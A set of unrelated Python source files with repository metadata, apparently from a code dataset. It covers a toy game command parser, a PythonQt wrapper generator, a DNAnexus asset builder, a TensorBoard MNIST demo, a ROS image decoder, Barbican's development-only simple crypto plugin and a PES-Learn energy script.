if cmd[6:] in commands:
output+='Usage:\t'+help_[cmd[6:]]
else:
output+=errors['no cmd']%(cmd[6:])
else:
output+='Commands:'
for cmd_ in help_.keys():
output+='\n'+help_[cmd_]
elif cmd[1:5]=='exit':
exit()
elif cmd[1:]=='calculator':
import calculator
elif cmd[1:9]=='gamerule':
if cmd[10:20]=='chatOutput':
if cmd[21:]=='false':
gamerules['chatOutput']=False
elif cmd[21:]=='true':
gamerules['chatOutput']=True
else:
output+=errors['bolean error']%(cmd[21:])+'\n'
output+='Usage:\t'+help_['gamerule']
if cmd[10:16]=='cheats':
if cmd[17:]=='false':
gamerules['cheats']=False
elif cmd[17:]=='true':
gamerules['cheats']=True
else:
output+=errors['bolean error']%(cmd[21:])+'\n'
output+='Usage:\t'+help_['gamerule']
if cmd[10:23]=='characterLine':
if cmd[24:]=='false':
gamerules['ccharacterLine']=False
elif cmd[24:]=='true':
gamerules['characterLine']=True
else:
output+=errors['bolean error']%(cmd[21:])+'\n'
output+='Usage:\t'+help_['gamerule']
elif cmd[1:7]=='effect':
if cmd[8:16]=='strenght':
output+='strenght'
if cmd[16]==' ':
if cmd[17:20].isnumeric():
output+=' '+int(cmd[17:20])
else:
output+=errors['intiger error']%('Number')+'\n'
output+='Usage:\t'+help_['effect']
else:
output+=errors['intiger error']%('Number')+'\n'
output+='Usage:\t'+help_['effect']
else:
output+='<%s> '%(user)
output+=cmd[0:]
return output
coords={'krzem':{'x':1,'y':1,'z':1}}
EXP=100
for gamerule in gamerules.keys():
print(gamerule)
while True:
print(interpret_command(input('>>>')))
print()
| 28.803797 | 277 | 0.587343 |
f17c790d384bf44d1a800b5b075ced9cb5cd500f
| 6,586 |
py
|
Python
|
src/app/WrapPythonQt.py
|
edrumwri/director
|
c82aff0ed2ad0083dc5ac9cf4b90994d2d852be8
|
[
"BSD-3-Clause"
] | null | null | null |
src/app/WrapPythonQt.py
|
edrumwri/director
|
c82aff0ed2ad0083dc5ac9cf4b90994d2d852be8
|
[
"BSD-3-Clause"
] | null | null | null |
src/app/WrapPythonQt.py
|
edrumwri/director
|
c82aff0ed2ad0083dc5ac9cf4b90994d2d852be8
|
[
"BSD-3-Clause"
] | null | null | null |
import os
import re
import sys
import argparse
def wrap(args):
inFileNames = args.input_file
outFileName = args.output_file
exportSymbol = args.export_symbol
exportHeader = args.export_header
decoratorClassName = args.class_name
classNamePrefixes = args.class_prefixes
qtClassNamePrefixes = args.qt_class_prefixes
moduleName = args.module_name
autoClassIncludes = args.auto_class_includes
if not decoratorClassName:
if not outFileName.endswith('.h'):
raise Exception('Error: when output class name is not provided then the'
' output file extension must be .h')
decoratorClassName = os.path.basename(outFileName).replace('.h', '')
lines = []
for inFileName in inFileNames:
inFile = open(inFileName, 'r')
lines += inFile.read().splitlines()
inFile.close()
classNameRegexes = [re.compile('\\b%s[a-zA-Z0-9]*' % prefix) for prefix in classNamePrefixes]
qtClassNamePrefixes = tuple(qtClassNamePrefixes)
moduleName = moduleName or 'PythonQt'
exportInclude = '#include "%s"' % exportHeader if exportHeader else ''
generatedCode = str()
rePattern = re.compile('(?:(.+)\s+)?(\S+)::(\S+)\((.*)\).*')
includeClasses = set()
includeLines = list()
for line in lines:
if line.startswith("//"):
generatedCode += " " + line + "\n"
continue
elif line.startswith("#include"):
includeLines.append(line)
continue
elif not line.strip():
generatedCode += "\n"
continue
matchList = rePattern.findall(line)
if not matchList or len(matchList[0]) != 4:
raise Exception('Failed to match: "%s"' % line)
matchList = list(matchList[0])
return_type = matchList[0].strip()
class_name = matchList[1]
method_name = matchList[2]
args = matchList[3]
arg_list = args.split(",") if args.strip() else []
is_static = return_type.startswith("static ")
is_destructor = '~' == method_name[0]
is_constructor = not is_destructor and return_type == ''
if is_static:
return_type = return_type[7:]
decorator_method_name = "static_%s_%s" % (class_name, method_name)
elif is_destructor:
return_type = 'void'
decorator_method_name = "delete_%s" % class_name
elif is_constructor:
return_type = '%s*' % class_name
decorator_method_name = "new_%s" % class_name
else:
decorator_method_name = method_name
includeClasses.add(class_name)
for regex in classNameRegexes:
classname_matches = regex.findall(return_type)
for classname in classname_matches:
includeClasses.add(classname)
wrap_args = []
if not is_static and not is_constructor:
wrap_args.append("%s* inst" % class_name)
wrap_args_call = []
for i, arg_type in enumerate(arg_list):
arg_name = "arg%d" % i
wrap_args.append("%s %s" % (arg_type.strip(), arg_name))
wrap_args_call.append(arg_name)
callStatement = "%s(%s)" % (method_name, ", ".join(wrap_args_call))
if is_static:
callStatement = "%s::%s" % (class_name, callStatement)
elif is_destructor:
callStatement = 'delete inst'
elif is_constructor:
callStatement = 'new %s' % callStatement
else:
callStatement = "inst->%s" % callStatement
if return_type == 'void':
returnStatement = "%s;" % callStatement
else:
returnStatement = "return %s;" % callStatement
outStr = \
'''
%s %s(%s)
{
%s
}
'''
outStr = outStr % (return_type,
decorator_method_name,
", ".join(wrap_args),
returnStatement)
generatedCode += outStr
sortedClasses = list(includeClasses)
sortedClasses.sort()
if autoClassIncludes:
includeLines += ['#include "%s.h"' % className for className in sortedClasses]
classIncludes = "\n".join(includeLines)
classRegisters = "\n".join([' this->registerClassForPythonQt(&%s::staticMetaObject);' % className
for className in sortedClasses if className.startswith(qtClassNamePrefixes)])
outFile = open(outFileName, 'w')
outFile.write('''
#ifndef __%s_h
#define __%s_h
#include <QObject>
#include <PythonQt.h>
%s
%s
class %s %s : public QObject
{
Q_OBJECT
public:
%s(QObject* parent=0) : QObject(parent)
{
%s
}
inline void registerClassForPythonQt(const QMetaObject* metaobject)
{
PythonQt::self()->registerClass(metaobject, "%s");
}
public Q_SLOTS:
%s
};
#endif''' % (
decoratorClassName,
decoratorClassName,
exportInclude,
classIncludes,
exportSymbol,
decoratorClassName,
decoratorClassName,
classRegisters,
moduleName,
generatedCode))
outFile.close()
def main():
parser = argparse.ArgumentParser(description='Generate a PythonQt decorator class file from a list of method signatures.')
parser.add_argument('--input-file', '-i', nargs='+', required=True, help='A text file with method signatures, one per line.')
parser.add_argument('--output-file', '-o', required=True, help='The output filename. The file extension should be .h')
parser.add_argument('--module-name', default='', help='The Python module name under which Qt classes will be registered.')
parser.add_argument('--class-name', default='', help='The C++ class name of the generated decorator.'
' If empty, it will be computed from the output filename.')
parser.add_argument('--export-symbol', default='', help='An export symbol that will be added to the class declaration.')
parser.add_argument('--export-header', default='', help='A header filename that defines an export symbol.')
parser.add_argument('--class-prefixes', nargs='*', help='A list of class name prefixes.')
parser.add_argument('--qt-class-prefixes', nargs='*', help='A list of Qt class name prefixes.')
parser.add_argument('--auto-class-includes', action='store_true', help='Automatically generate include statements from class names.')
args = parser.parse_args()
wrap(args)
if __name__ == '__main__':
main()
| 31.970874 | 137 | 0.612967 |
2554db36b64be932128fcc6c521238fadbce4837
| 8,631 |
py
|
Python
|
asset_builder_py3.py
|
dnanexus/dx_app_builder
|
16cca82af6fe41afb4a74828fafbc3992de359c7
|
[
"Apache-2.0"
] | null | null | null |
asset_builder_py3.py
|
dnanexus/dx_app_builder
|
16cca82af6fe41afb4a74828fafbc3992de359c7
|
[
"Apache-2.0"
] | 16 |
2016-04-22T16:54:07.000Z
|
2021-12-15T04:45:59.000Z
|
asset_builder_py3.py
|
dnanexus/dx_app_builder
|
16cca82af6fe41afb4a74828fafbc3992de359c7
|
[
"Apache-2.0"
] | 2 |
2017-06-16T08:58:06.000Z
|
2020-12-15T17:24:01.000Z
|
# Copyright (C) 2016 DNAnexus, Inc.
#
# This file is part of dx_asset_builder.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy
# of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
from os import path
import subprocess
from subprocess import PIPE
import tempfile
import random
import time
import json
import sys
import re
import lsb_release
import dxpy
from dxpy.utils.exec_utils import DXExecDependencyInstaller
def install_run_spec(exec_depends):
run_spec = {"runSpec": {"execDepends": exec_depends}}
job_desc = dxpy.get_handler(dxpy.JOB_ID).describe()
dx_installer = DXExecDependencyInstaller(run_spec, job_desc)
dx_installer.install()
def get_file_list(output_file, resources_to_ignore):
"""
This method find all the files in the system and writes it to the output file
"""
tmp_dir = path.dirname(output_file) + "*"
skipped_paths = ["/proc*", tmp_dir, "/run*", "/boot*", "/home/dnanexus*", "/sys*", "/var/lib/lxc*",
"/dev/ptmx", "/dev/pts/ptmx", "/dev/fuse", "/dev/net/tun"]
if lsb_release.get_os_release().get("CODENAME", "xenial") == "focal":
# Ubuntu 20.04 /bin and /sbin are symlinks to /usr/bin and /usr/sbin
skipped_paths.extend(["/bin", "/sbin", "/snap/*", "/dev/*"])
cmd = ["sudo", "find", "/"]
for ignore_dir in (skipped_paths + resources_to_ignore):
cmd.extend(["-not", "-path", ignore_dir])
env = os.environ.copy()
env['LC_ALL'] = 'C'
ps_pipe = subprocess.Popen(cmd, stdout=subprocess.PIPE)
ps_file = subprocess.Popen(["sort"], stdin=ps_pipe.stdout, stdout=PIPE, env=env)
with open(output_file, "w") as bfile:
for line in ps_file.stdout:
sp_code = ps_file.poll()
file_name = line.rstrip().decode()
if file_name == "":
if sp_code is not None:
break
else:
continue
if file_name == "/":
continue
try:
mtime = str(os.path.getmtime(file_name))
except OSError as os_err:
print(os_err)
mtime = ''
# file_name should not have special characters
# TODO escape the file name
bfile.write(file_name + "\t" + str(mtime) + '\n')
ps_file.stdout.close()
def get_file_diffs(first_file, second_file, diff_file):
""" Get difference between two txt files and write the difference to the
third file.
"""
cmd = ["sudo", "comm", "-13", first_file, second_file]
ps_pipe = subprocess.Popen(cmd, stdout=subprocess.PIPE)
with open(diff_file, "w") as bfile:
for line in ps_pipe.stdout:
line = line.rstrip().decode()
file_name = '\t'.join(line.split('\t')[:-1])
bfile.write(file_name + '\n')
ps_pipe.stdout.close()
def get_system_snapshot(output_file_path, ignore_files):
sys_tmp_dir = tempfile.gettempdir()
tmp_file_name = "file_" + str(random.randint(0, 1000000)) + "_" + str(int(time.time() * 1000)) + ".txt"
tmp_file_path = os.path.join(tempfile.gettempdir(), tmp_file_name)
get_file_list(tmp_file_path, ignore_files)
with open(output_file_path, 'w') as output_file_handle:
proc = subprocess.Popen(['sort', tmp_file_path], stdout=output_file_handle)
proc.communicate()
def build_asset(conf_json_fh, asset_makefile_fh, custom_asset_fh):
conf_json_fh = dxpy.DXFile(conf_json_fh)
if asset_makefile_fh is not None:
asset_makefile_fh = dxpy.DXFile(asset_makefile_fh)
if custom_asset_fh is not None:
custom_asset_fh = dxpy.DXFile(custom_asset_fh)
asset_conffile_path = "assetLib.json"
custom_assetfile_path = "asset-dl.tar.gz"
asset_makefile_path = "Makefile"
dxpy.download_dxfile(conf_json_fh, asset_conffile_path)
if asset_makefile_fh is not None:
dxpy.download_dxfile(asset_makefile_fh, asset_makefile_path)
if custom_asset_fh is not None:
dxpy.download_dxfile(custom_asset_fh, custom_assetfile_path)
with open(asset_conffile_path) as asset:
conf_data = json.load(asset)
# get list of directories in resources to ignore
ignore_dir = conf_data.get("excludeResource", [])
before_file_path_sort = tempfile.gettempdir() + '/before-sorted.txt'
print("Preparing the list of files in the system before installing any library.", file=sys.stderr)
get_system_snapshot(before_file_path_sort, ignore_dir)
if custom_asset_fh is not None:
print("Installing custom resources given by the user in the tarball.", file=sys.stderr)
subprocess.check_call(["sudo", "tar", "-xzf", custom_assetfile_path, '--no-same-owner', "-C", "/"])
if "execDepends" in conf_data:
print("Installing execDepends.", file=sys.stderr)
install_run_spec(conf_data['execDepends'])
# when running make, grab the output and err before raising error
if asset_makefile_fh is not None:
print("Running make.", file=sys.stderr)
mk_cmd = ["make", "-C", os.getcwd()]
process = subprocess.Popen(mk_cmd, stdout=subprocess.PIPE)
output, err = process.communicate()
retcode = process.poll()
if retcode:
cmd = mk_cmd
print(output, file=sys.stdout)
print(err, file=sys.stderr)
raise subprocess.CalledProcessError(retcode, cmd, output=output)
after_file_path_sort = tempfile.gettempdir() + '/after-sorted.txt'
print("Preparing the list of files in the system after installing user libraries.", file=sys.stderr)
get_system_snapshot(after_file_path_sort, ignore_dir)
diff_file_path = tempfile.gettempdir() + "/diff.txt"
print("Preparing the list of new and updated files after the installation.", file=sys.stderr)
get_file_diffs(before_file_path_sort, after_file_path_sort, diff_file_path)
# TODO: temporary fix for dx-unpack not tokenizing its command line
# correctly, resulting in being unable to extract filenames with whitespace
# in them
tar_output = re.sub(r"\s+", '-', conf_data["name"]) + ".tar.gz"
print("Creating the tarball '" + tar_output + "' of files listed in: " + diff_file_path, file=sys.stderr)
tar_cmd = ["tar", "-Pcz", "--no-recursion", "-T", diff_file_path, "-f", "-"]
tar_ps = subprocess.Popen(tar_cmd, stdout=subprocess.PIPE)
upload_ps = subprocess.Popen(["dx", "upload", "-", "--wait", "--brief", "-o", tar_output,
"--visibility", "hidden"],
stdin=tar_ps.stdout, stdout=subprocess.PIPE)
tar_ps.stdout.close()
asset_tarball_id = upload_ps.communicate()[0].rstrip().decode()
tar_ps.wait()
upload_ps.stdout.close()
# Create a record object referring to this hidden file
record_name = conf_data["name"]
record_details = {"archiveFileId": {"$dnanexus_link": asset_tarball_id}}
# Older clients do not provide the 'runSpecVersion' field in dxasset.json
if "runSpecVersion" in conf_data:
run_spec_version = str(conf_data["runSpecVersion"])
else:
run_spec_version = "0"
record_properties = {
"title": conf_data["title"],
"description": conf_data["description"],
"version": conf_data["version"],
"distribution": conf_data["distribution"],
"release": conf_data["release"],
"runSpecVersion": run_spec_version
}
asset_bundle = dxpy.new_dxrecord(name=record_name,
types=["AssetBundle"], details=record_details,
properties=record_properties, close=True)
# Add a property called {"AssetBundle": record-xxx} to the hidden tarball
asset_file = dxpy.DXFile(asset_tarball_id)
asset_file.set_properties({"AssetBundle": asset_bundle.get_id()})
print(sys.stderr, "\n'" + record_name + "' asset bundle created!\n", file=sys.stderr)
output = {}
output["asset_bundle"] = dxpy.dxlink(asset_bundle)
return output
| 41.296651 | 109 | 0.649056 |
56490d48aab4d78333b8e96c61b2b0c072c08bc1
| 3,423 |
py
|
Python
|
businesslayer/ai/deep-learning/tensorboard/scripts/TensorBoardGradientMnistDemo.py
|
dragomirdev/DataTachyonPlatform
|
733ce014b33942d1962b1d4c80aae47699e9ff15
|
[
"CC-BY-4.0",
"MIT"
] | null | null | null |
businesslayer/ai/deep-learning/tensorboard/scripts/TensorBoardGradientMnistDemo.py
|
dragomirdev/DataTachyonPlatform
|
733ce014b33942d1962b1d4c80aae47699e9ff15
|
[
"CC-BY-4.0",
"MIT"
] | null | null | null |
businesslayer/ai/deep-learning/tensorboard/scripts/TensorBoardGradientMnistDemo.py
|
dragomirdev/DataTachyonPlatform
|
733ce014b33942d1962b1d4c80aae47699e9ff15
|
[
"CC-BY-4.0",
"MIT"
] | null | null | null |
import tensorflow as tf
import datetime
# Clear any logs from previous runs
# !rm -rf ./logs/
# Using the MNIST dataset, normalize the data and using simple Keras model for classifying the images into 10 classes.
mnist = tf.keras.datasets.mnist
(x_train, y_train),(x_test, y_test) = mnist.load_data()
x_train, x_test = x_train / 255.0, x_test / 255.0
def create_model():
return tf.keras.models.Sequential([
tf.keras.layers.Flatten(input_shape=(28, 28)),
tf.keras.layers.Dense(512, activation='relu'),
tf.keras.layers.Dropout(0.2),
tf.keras.layers.Dense(10, activation='softmax')
])
# Using TensorBoard with other methods like Gradient Type
train_dataset = tf.data.Dataset.from_tensor_slices((x_train, y_train))
test_dataset = tf.data.Dataset.from_tensor_slices((x_test, y_test))
train_dataset = train_dataset.shuffle(60000).batch(64)
test_dataset = test_dataset.batch(64)
loss_object = tf.keras.losses.SparseCategoricalCrossentropy()
optimizer = tf.keras.optimizers.Adam()
# Define our metrics
train_loss = tf.keras.metrics.Mean('train_loss', dtype=tf.float32)
train_accuracy = tf.keras.metrics.SparseCategoricalAccuracy('train_accuracy')
test_loss = tf.keras.metrics.Mean('test_loss', dtype=tf.float32)
test_accuracy = tf.keras.metrics.SparseCategoricalAccuracy('test_accuracy')
# Define the training and test functions:
def train_step(model, optimizer, x_train, y_train):
with tf.GradientTape() as tape:
predictions = model(x_train, training=True)
loss = loss_object(y_train, predictions)
grads = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(zip(grads, model.trainable_variables))
train_loss(loss)
train_accuracy(y_train, predictions)
def test_step(model, x_test, y_test):
predictions = model(x_test)
loss = loss_object(y_test, predictions)
test_loss(loss)
test_accuracy(y_test, predictions)
# Set up summary writers to write the summaries to disk in a different logs directory:
current_time = datetime.datetime.now().strftime("%Y%m%d-%H%M%S")
train_log_dir = 'logs/gradient_tape/' + current_time + '/train'
test_log_dir = 'logs/gradient_tape/' + current_time + '/test'
train_summary_writer = tf.summary.create_file_writer(train_log_dir)
test_summary_writer = tf.summary.create_file_writer(test_log_dir)
model = create_model() # reset our model
EPOCHS = 5
for epoch in range(EPOCHS):
for (x_train, y_train) in train_dataset:
train_step(model, optimizer, x_train, y_train)
with train_summary_writer.as_default():
tf.summary.scalar('loss', train_loss.result(), step=epoch)
tf.summary.scalar('accuracy', train_accuracy.result(), step=epoch)
for (x_test, y_test) in test_dataset:
test_step(model, x_test, y_test)
with test_summary_writer.as_default():
tf.summary.scalar('loss', test_loss.result(), step=epoch)
tf.summary.scalar('accuracy', test_accuracy.result(), step=epoch)
template = 'Epoch {}, Loss: {}, Accuracy: {}, Test Loss: {}, Test Accuracy: {}'
print(template.format(epoch + 1,
train_loss.result(),
train_accuracy.result() * 100,
test_loss.result(),
test_accuracy.result() * 100))
# Reset metrics every epoch
train_loss.reset_states()
test_loss.reset_states()
train_accuracy.reset_states()
test_accuracy.reset_states()
| 35.65625 | 118 | 0.722466 |
f1c255bab67aae84eecfe1d2afc1875ccb6ef0dd
| 9,389 |
py
|
Python
|
barbican/plugin/crypto/simple_crypto.py
|
mail2nsrajesh/barbican
|
d16d932b77486e9b2f8c6d30e628a6e66517b1a6
|
[
"Apache-2.0"
] | null | null | null |
barbican/plugin/crypto/simple_crypto.py
|
mail2nsrajesh/barbican
|
d16d932b77486e9b2f8c6d30e628a6e66517b1a6
|
[
"Apache-2.0"
] | null | null | null |
barbican/plugin/crypto/simple_crypto.py
|
mail2nsrajesh/barbican
|
d16d932b77486e9b2f8c6d30e628a6e66517b1a6
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from cryptography import fernet
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.asymmetric import dsa
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives import serialization
from oslo_config import cfg
from oslo_utils import encodeutils
import six
from barbican.common import config
from barbican.common import utils
from barbican import i18n as u
from barbican.plugin.crypto import base as c
CONF = config.new_config()
LOG = utils.getLogger(__name__)
simple_crypto_plugin_group = cfg.OptGroup(name='simple_crypto_plugin',
title="Simple Crypto Plugin Options")
simple_crypto_plugin_opts = [
cfg.StrOpt('kek',
default='dGhpcnR5X3R3b19ieXRlX2tleWJsYWhibGFoYmxhaGg=',
help=u._('Key encryption key to be used by Simple Crypto '
'Plugin'), secret=True),
cfg.StrOpt('plugin_name',
help=u._('User friendly plugin name'),
default='Software Only Crypto'),
]
CONF.register_group(simple_crypto_plugin_group)
CONF.register_opts(simple_crypto_plugin_opts, group=simple_crypto_plugin_group)
config.parse_args(CONF)
def list_opts():
yield simple_crypto_plugin_group, simple_crypto_plugin_opts
class SimpleCryptoPlugin(c.CryptoPluginBase):
"""Insecure implementation of the crypto plugin."""
def __init__(self, conf=CONF):
self.master_kek = conf.simple_crypto_plugin.kek
self.plugin_name = conf.simple_crypto_plugin.plugin_name
LOG.warning("This plugin is NOT meant for a production "
"environment. This is meant just for development "
"and testing purposes. Please use another plugin "
"for production.")
def get_plugin_name(self):
return self.plugin_name
def _get_kek(self, kek_meta_dto):
if not kek_meta_dto.plugin_meta:
raise ValueError(u._('KEK not yet created.'))
# the kek is stored encrypted. Need to decrypt.
encryptor = fernet.Fernet(self.master_kek)
# Note : If plugin_meta type is unicode, encode to byte.
if isinstance(kek_meta_dto.plugin_meta, six.text_type):
kek_meta_dto.plugin_meta = kek_meta_dto.plugin_meta.encode('utf-8')
return encryptor.decrypt(kek_meta_dto.plugin_meta)
def encrypt(self, encrypt_dto, kek_meta_dto, project_id):
kek = self._get_kek(kek_meta_dto)
unencrypted = encrypt_dto.unencrypted
if not isinstance(unencrypted, six.binary_type):
raise ValueError(
u._(
'Unencrypted data must be a byte type, but was '
'{unencrypted_type}'
).format(
unencrypted_type=type(unencrypted)
)
)
encryptor = fernet.Fernet(kek)
cyphertext = encryptor.encrypt(unencrypted)
return c.ResponseDTO(cyphertext, None)
def decrypt(self, encrypted_dto, kek_meta_dto, kek_meta_extended,
project_id):
kek = self._get_kek(kek_meta_dto)
encrypted = encrypted_dto.encrypted
decryptor = fernet.Fernet(kek)
return decryptor.decrypt(encrypted)
def bind_kek_metadata(self, kek_meta_dto):
kek_meta_dto.algorithm = 'aes'
kek_meta_dto.bit_length = 128
kek_meta_dto.mode = 'cbc'
if not kek_meta_dto.plugin_meta:
# the kek is stored encrypted in the plugin_meta field
encryptor = fernet.Fernet(self.master_kek)
key = fernet.Fernet.generate_key()
kek_meta_dto.plugin_meta = encryptor.encrypt(key)
return kek_meta_dto
def generate_symmetric(self, generate_dto, kek_meta_dto, project_id):
byte_length = int(generate_dto.bit_length) // 8
unencrypted = os.urandom(byte_length)
return self.encrypt(c.EncryptDTO(unencrypted),
kek_meta_dto,
project_id)
def generate_asymmetric(self, generate_dto, kek_meta_dto, project_id):
"""Generate asymmetric keys based on below rules:
- RSA, with passphrase (supported)
- RSA, without passphrase (supported)
- DSA, without passphrase (supported)
- DSA, with passphrase (supported)
"""
if(generate_dto.algorithm is None or generate_dto
.algorithm.lower() == 'rsa'):
private_key = rsa.generate_private_key(
public_exponent=65537,
key_size=generate_dto.bit_length,
backend=default_backend()
)
elif generate_dto.algorithm.lower() == 'dsa':
private_key = dsa.generate_private_key(
key_size=generate_dto.bit_length,
backend=default_backend()
)
else:
raise c.CryptoPrivateKeyFailureException()
public_key = private_key.public_key()
if generate_dto.algorithm.lower() == 'rsa':
private_key = private_key.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.PKCS8,
encryption_algorithm=self._get_encryption_algorithm(
generate_dto.passphrase)
)
public_key = public_key.public_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PublicFormat.SubjectPublicKeyInfo
)
if generate_dto.algorithm.lower() == 'dsa':
private_key = private_key.private_bytes(
encoding=serialization.Encoding.DER,
format=serialization.PrivateFormat.PKCS8,
encryption_algorithm=self._get_encryption_algorithm(
generate_dto.passphrase)
)
public_key = public_key.public_bytes(
encoding=serialization.Encoding.DER,
format=serialization.PublicFormat.SubjectPublicKeyInfo
)
private_dto = self.encrypt(c.EncryptDTO(private_key),
kek_meta_dto,
project_id)
public_dto = self.encrypt(c.EncryptDTO(public_key),
kek_meta_dto,
project_id)
passphrase_dto = None
if generate_dto.passphrase:
if isinstance(generate_dto.passphrase, six.text_type):
generate_dto.passphrase = generate_dto.passphrase.encode(
'utf-8')
passphrase_dto = self.encrypt(c.EncryptDTO(generate_dto.
passphrase),
kek_meta_dto,
project_id)
return private_dto, public_dto, passphrase_dto
def supports(self, type_enum, algorithm=None, bit_length=None,
mode=None):
if type_enum == c.PluginSupportTypes.ENCRYPT_DECRYPT:
return True
if type_enum == c.PluginSupportTypes.SYMMETRIC_KEY_GENERATION:
return self._is_algorithm_supported(algorithm,
bit_length)
elif type_enum == c.PluginSupportTypes.ASYMMETRIC_KEY_GENERATION:
return self._is_algorithm_supported(algorithm,
bit_length)
else:
return False
def _get_encryption_algorithm(self, passphrase):
"""Choose whether to use encryption or not based on passphrase
serialization.BestAvailableEncryption fails if passphrase is not
given or if less than one byte therefore we need to check if it is
valid or not
"""
if passphrase:
# encryption requires password in bytes format
algorithm = serialization.BestAvailableEncryption(
# default encoding is utf-8
encodeutils.safe_encode(passphrase)
)
else:
algorithm = serialization.NoEncryption()
return algorithm
def _is_algorithm_supported(self, algorithm=None, bit_length=None):
"""check if algorithm and bit_length combination is supported."""
if algorithm is None or bit_length is None:
return False
if (algorithm.lower() in
c.PluginSupportTypes.SYMMETRIC_ALGORITHMS and bit_length in
c.PluginSupportTypes.SYMMETRIC_KEY_LENGTHS):
return True
elif (algorithm.lower() in c.PluginSupportTypes.ASYMMETRIC_ALGORITHMS
and bit_length in c.PluginSupportTypes.ASYMMETRIC_KEY_LENGTHS):
return True
else:
return False
| 39.616034 | 79 | 0.629673 |
78204928e9e7ba0f0a1c584af1a758b0f0120aa1
| 2,413 |
py
|
Python
|
src/decoder_node.py
|
TienPoly/VO_duckiebot
|
b1ea4a7656d9d8e580f64584eb831e15b825a19c
|
[
"BSD-3-Clause"
] | null | null | null |
src/decoder_node.py
|
TienPoly/VO_duckiebot
|
b1ea4a7656d9d8e580f64584eb831e15b825a19c
|
[
"BSD-3-Clause"
] | null | null | null |
src/decoder_node.py
|
TienPoly/VO_duckiebot
|
b1ea4a7656d9d8e580f64584eb831e15b825a19c
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
import rospy
from cv_bridge import CvBridge, CvBridgeError
import cv2
import numpy as np
from sensor_msgs.msg import CompressedImage,Image
#from duckietown_msgs.msg import BoolStamped
class DecoderNode(object):
def __init__(self):
self.node_name = rospy.get_name()
self.active = True
self.bridge = CvBridge()
self.publish_freq = self.setupParam("~publish_freq", 30.0)
self.publish_duration = rospy.Duration.from_sec(1.0/self.publish_freq)
self.pub_raw = rospy.Publisher("~image/raw",Image,queue_size=1)
self.pub_compressed = rospy.Publisher("~image/compressed", CompressedImage, queue_size=1)
self.last_stamp = rospy.Time.now()
self.sub_compressed_img = rospy.Subscriber("~compressed_image",CompressedImage,self.cbImg,queue_size=1)
#self.sub_switch = rospy.Subscriber("~switch",BoolStamped, self.cbSwitch, queue_size=1)
def setupParam(self,param_name,default_value):
value = rospy.get_param(param_name,default_value)
rospy.set_param(param_name,value) #Write to parameter server for transparancy
rospy.loginfo("[%s] %s = %s " %(self.node_name,param_name,value))
return value
#def cbSwitch(self,switch_msg):
# self.active = switch_msg.data
def cbImg(self,msg):
if not self.active:
return
now = rospy.Time.now()
if now - self.last_stamp < self.publish_duration:
return
else:
self.last_stamp = now
# time_start = time.time()
np_arr = np.fromstring(msg.data, np.uint8)
cv_image = cv2.imdecode(np_arr, cv2.IMREAD_COLOR)
# time_1 = time.time()
img_msg = self.bridge.cv2_to_imgmsg(cv_image, "bgr8")
# time_2 = time.time()
img_msg.header.stamp = msg.header.stamp
img_msg.header.frame_id = msg.header.frame_id
self.pub_raw.publish(img_msg)
self.pub_compressed.publish(msg)
# time_3 = time.time()
# rospy.loginfo("[%s] Took %f sec to decompress."%(self.node_name,time_1 - time_start))
# rospy.loginfo("[%s] Took %f sec to conver to Image."%(self.node_name,time_2 - time_1))
# rospy.loginfo("[%s] Took %f sec to publish."%(self.node_name,time_3 - time_2))
if __name__ == '__main__':
rospy.init_node('decoder_low_freq',anonymous=False)
node = DecoderNode()
rospy.spin()
| 40.216667 | 111 | 0.665562 |
cb834d19f8cfdb7293a2595f88dfa764bc30d95f
| 3,069 |
py
|
Python
|
1_Tutorials/1_water_pes_api/model5_data/compute_energy.py
|
zero0911/PES-Learn
|
7a956db1aff368f978dd3c5c08ef99aec2613d53
|
[
"BSD-3-Clause"
] | 2 |
2020-11-02T07:23:14.000Z
|
2020-11-05T10:21:59.000Z
|
1_Tutorials/1_water_pes_api/model5_data/compute_energy.py
|
zero0911/PES-Learn
|
7a956db1aff368f978dd3c5c08ef99aec2613d53
|
[
"BSD-3-Clause"
] | null | null | null |
1_Tutorials/1_water_pes_api/model5_data/compute_energy.py
|
zero0911/PES-Learn
|
7a956db1aff368f978dd3c5c08ef99aec2613d53
|
[
"BSD-3-Clause"
] | null | null | null |
from peslearn.ml import NeuralNetwork
from peslearn import InputProcessor
import torch
import numpy as np
from itertools import combinations
nn = NeuralNetwork('PES.dat', InputProcessor(''), molecule_type='A2B')
params = {'layers': (16,), 'morse_transform': {'morse': False}, 'pip': {'degree_reduction': False, 'pip': True}, 'scale_X': {'activation': 'tanh', 'scale_X': 'std'}, 'scale_y': 'mm11', 'lr': 0.5}
X, y, Xscaler, yscaler = nn.preprocess(params, nn.raw_X, nn.raw_y)
model = torch.load('model.pt')
# How to use 'compute_energy()' function
# --------------------------------------
# E = compute_energy(geom_vectors, cartesian=bool)
# 'geom_vectors' is either:
# 1. A list or tuple of coordinates for a single geometry.
# 2. A column vector of one or more sets of 1d coordinate vectors as a list of lists or 2D NumPy array:
# [[ coord1, coord2, ..., coordn],
# [ coord1, coord2, ..., coordn],
# : : : ],
# [ coord1, coord2, ..., coordn]]
# In all cases, coordinates should be supplied in the exact same format and exact same order the model was trained on.
# If the coordinates format used to train the model was interatomic distances, each set of coordinates should be a 1d array of either interatom distances or cartesian coordinates.
# If cartesian coordinates are supplied, cartesian=True should be passed and it will convert them to interatomic distances.
# The order of coordinates matters. If PES-Learn datasets were used they should be in standard order;
# i.e. cartesians should be supplied in the order x,y,z of most common atoms first, with alphabetical tiebreaker.
